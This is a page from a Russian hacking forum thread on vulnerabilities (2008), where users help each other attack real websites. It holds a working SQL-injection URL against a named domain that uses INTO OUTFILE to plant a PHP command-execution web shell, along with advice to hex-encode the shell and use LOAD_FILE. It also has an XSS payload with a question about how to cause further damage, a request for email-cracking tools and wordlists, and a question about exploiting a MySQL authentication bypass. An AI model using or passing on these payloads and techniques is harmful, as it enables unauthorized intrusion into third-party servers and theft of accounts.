HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1841  
Старый 29.04.2008, 14:25
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию

Цитата:
Сообщение от n0ne  
-=megahertz=-, напиши там же uname -a и скинь результат
Linux vs-server 2.6.18-5-xen-686 #1 SMP Mon Dec 24 20:49:58 UTC 2007 i686 GNU/Linux
 
Ответить с цитированием

  #1842  
Старый 29.04.2008, 17:32
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
С нами: 9507243

Репутация: 37
По умолчанию

Была найдена такая уязвимость: на одном варез сайте есть такой сервис, что если к адресу сайта подписать такое: site.ru/?site=ваш_сайт (без HTTP://), то на всех страницах сайта будет ссылка внизу страницы на ваш_сайт! Попробова ввести такой URL вида site.ru/fol/?list="><script>alert()</script> - выскакивает аларм )) попробовал ввести в URL php код - не прлучилось, вопросительные знаки режутся. Пробовал в разных кодировках - все бестолку. Но кроме знака вопроса больше ничего не режется! Вопрос собственно такой: как еще можно навредить сайту через эту уязвимость если сайт НЕ поддерживает куки? Там вообще даже нету регистрации юзеров.
 
Ответить с цитированием

  #1843  
Старый 29.04.2008, 18:13
sasha008
Познающий
Регистрация: 02.04.2008
Сообщений: 82
С нами: 9530176

Репутация: 113
По умолчанию

Где можно раздобыть хорошую прогу для взлома емейла и плюс хороший словарь?
 
Ответить с цитированием

  #1844  
Старый 29.04.2008, 22:58
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
С нами: 9587456

Репутация: 120
По умолчанию

Блин нифига понять немогу

есть скуль такого вида
danko.dn.ua/news.php?id=-17+union+select+1,'<?%20system($_GET[''cmd''])%20?>',3+from+mysql.user+into+outfile+''/usr/local/www/data/admin/fckeditor/_samples/php/gif.php/'

пишет Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/news.php

ver-5.1.22-rc
user-root@localhost

http://danko.dn.ua/admin/fckeditor/_samples/php/

Последний раз редактировалось neon_fx; 29.04.2008 в 23:41..
 
Ответить с цитированием

  #1845  
Старый 29.04.2008, 23:23
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

даже после нормальной заливки шелла может возвращаться ошибка, и еще лучше шелл закодировать в hex, и точно кавычки не экранируются?
возможно нет прав/файл существует, вобщем по тем данным что ты дал, одназначно не скажешь
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 29.04.2008 в 23:27..
 
Ответить с цитированием

  #1846  
Старый 30.04.2008, 02:39
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами: 10282956

Репутация: 380
По умолчанию

Цитата:
Сообщение от neon_fx  
Блин нифига понять немогу

есть скуль такого вида
danko.dn.ua/news.php?id=-17+union+select+1,'<?%20system($_GET[''cmd''])%20?>',3+from+mysql.user+into+outfile+''/usr/local/www/data/admin/fckeditor/_samples/php/gif.php/'

пишет Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/news.php

ver-5.1.22-rc
user-root@localhost

http://danko.dn.ua/admin/fckeditor/_samples/php/
попробуй LOAD_FILE если не катит, попробуй в хекс закодировать путь до файла, если опять не катит, значит file_priv отключен, тогда забей, если все ок, то шелл в хекс и заливай.
 
Ответить с цитированием

  #1847  
Старый 30.04.2008, 03:45
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
С нами: 9587456

Репутация: 120
По умолчанию

LOAD_FILE есть
file_priv -ок
и шелл кодировать пробовал

буду пробовать залить в базу а потом из базы в файл

Последний раз редактировалось neon_fx; 30.04.2008 в 03:50..
 
Ответить с цитированием

  #1848  
Старый 30.04.2008, 07:55
Kuzya
Участник форума
Регистрация: 27.04.2008
Сообщений: 224
С нами: 9494306

Репутация: 313
По умолчанию

Скажите плиз где можно почитать про SSI-уязвимости (Server Side Include)
 
Ответить с цитированием

  #1849  
Старый 30.04.2008, 09:42
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию

Kuzya, _ttp://www.citforum.ru/internet/html/ssi.shtml и http://ru.wikipedia.org/wiki/SSI_(%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0 %BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B 5)
 
Ответить с цитированием

  #1850  
Старый 30.04.2008, 14:03
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами: 9984161

Репутация: 56
По умолчанию

кто подскажет как это реализовать?

Удаленный пользователь может представить специально обработанный авторизационный пакет, чтобы обойти механизм авторизации на MySQL сервере. Уязвимость расположена в check_scramble_323() функции.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.